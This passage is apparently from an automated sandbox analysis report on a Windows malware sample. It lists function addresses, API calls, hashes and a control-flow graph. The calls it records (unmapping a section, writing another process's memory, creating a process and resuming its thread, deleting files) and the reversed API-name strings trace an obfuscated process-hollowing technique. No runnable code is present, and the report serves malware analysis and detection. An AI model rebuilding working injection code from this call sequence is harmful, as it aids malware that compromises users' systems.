                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2521977463-737317276
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ce2d990a8a6a9c52279316f95568744fca23e58f6ac05f8bba85de21b4f613d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 629d5515bfd0cff9fd4554da7d7331bfe01ca5ffeac8ea52d14859df33b17452
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ce2d990a8a6a9c52279316f95568744fca23e58f6ac05f8bba85de21b4f613d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A018074684209AFEB02EFA8EC65E9AB7EEEB4C700F614414F905D7700D630AD00DB30
                                                                                                                                                                                                                                                                                                                                  Function 02DC7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f7af37a6698e30655b33417e3ca3f712d39962519fa1908bb77711c2c9241095
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e3ed59b85867772b6cd8d4dd904957f2da9dc7645beb0e4c14ab2fcc8e016a6b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7af37a6698e30655b33417e3ca3f712d39962519fa1908bb77711c2c9241095
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F0140B568020AAFEB01EF99EC65E9AF7EDEB49700F604854B801D7740D630AD50CF74
                                                                                                                                                                                                                                                                                                                                  Function 02DC8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                                                                                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3503870465-2520021413
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c584edda3144755da6c947b32b488d58c02b141cd27134e91fbfc312627441b0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 964a13e162509b87be362273d1f0bdf8a80c95c86dce3604ccec8a2795cd8f80
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c584edda3144755da6c947b32b488d58c02b141cd27134e91fbfc312627441b0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9014474680249AFEB06EBA5EC65F9AB7EDEB49700FA14468B401D7740D634AD40DA34
                                                                                                                                                                                                                                                                                                                                  Function 02DCDBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
                                                                                                                                                                                                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
                                                                                                                                                                                                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4284456518-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fb76ed20a4ca061ad2f4ddb6f4f39f7295996b8d99eac115a353214a6cae732e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 74e0f208e970efb42d3488b056b7529f381d65bb66b22385f5e4a8826b4d0861
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb76ed20a4ca061ad2f4ddb6f4f39f7295996b8d99eac115a353214a6cae732e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81016775944209AEEB06D7A0DD51FCD77BBEF44704F6145B69201E7281DAB4AF048B34
                                                                                                                                                                                                                                                                                                                                  Function 02DCDC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
                                                                                                                                                                                                                                                                                                                                  • RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
                                                                                                                                                                                                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
                                                                                                                                                                                                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1530111750-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 095348d280a0ade78e6ba2a3ffb099574e0866ae451fdcec0a14fdd71b569adb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cef00fcc23bac47efc222d678ee22d46645a47888a5c727ca50e2ff59d22cd7a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 095348d280a0ade78e6ba2a3ffb099574e0866ae451fdcec0a14fdd71b569adb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F701F47194020DBEDB11EBA0DD52FCDB3BEEB48700F6145B5E601E3680EA74AF048A74
                                                                                                                                                                                                                                                                                                                                  Function 02DC6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02DC6DB9,?,?,?,00000000), ref: 02DC6D99
                                                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02DC6EAC,00000000,00000000,02DC6E2B,?,00000000,02DC6E9B), ref: 02DC6E17
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2151042543-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac7d0aa4c8c382ec36603dcf97174c74fc3d6304d897b3efed1303448fc031a4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 278a112601ea5f6769326a9e63d6e481a457138f9c92ce8cba9f6138362c7d2b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac7d0aa4c8c382ec36603dcf97174c74fc3d6304d897b3efed1303448fc031a4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B501D4B1208705AEE712EF61EC228AB7BADEB89B00F61483AF405D3740E671DD10C8B0
                                                                                                                                                                                                                                                                                                                                  Function 02DD8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 4574 2dd8128-2dd8517 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db48ec 4689 2dd851d-2dd86f0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db47ec call 2db49a0 call 2db4d74 call 2db4df0 CreateProcessAsUserW 4574->4689 4690 2dd93a1-2dd9524 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db48ec 4574->4690 4799 2dd876e-2dd8879 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 4689->4799 4800 2dd86f2-2dd8769 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 4689->4800 4780 2dd952a-2dd9539 call 2db48ec 4690->4780 4781 2dd9cf5-2ddb2fa call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 * 16 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2dc7c10 call 2dc8338 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 ExitProcess 4690->4781 4780->4781 4788 2dd953f-2dd9812 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dcf094 call 2db4860 call 2db49a0 call 2db46d4 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db7e5c 4780->4788 5046 2dd9aef-2dd9cf0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db49f8 call 2dc8d70 4788->5046 5047 2dd9818-2dd9aea call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dce358 call 2db4530 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4de0 * 2 call 2db4764 call 2dcdc8c 4788->5047 4900 2dd887b-2dd887e 4799->4900 4901 2dd8880-2dd8ba0 call 2db49f8 call 2dcde50 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dcd164 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 4799->4901 4800->4799 4900->4901 5217 2dd8bb9-2dd939c call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 ResumeThread call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 CloseHandle call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8080 call 2dc894c * 6 CloseHandle call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 4901->5217 5218 2dd8ba2-2dd8bb4 call 2dc8730 4901->5218 5046->4781 5047->5046 5217->4690 5218->5217
